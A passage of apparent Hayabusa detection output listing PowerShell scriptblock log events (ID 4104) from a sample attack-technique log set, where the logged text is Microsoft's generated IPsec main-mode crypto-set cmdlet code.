[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 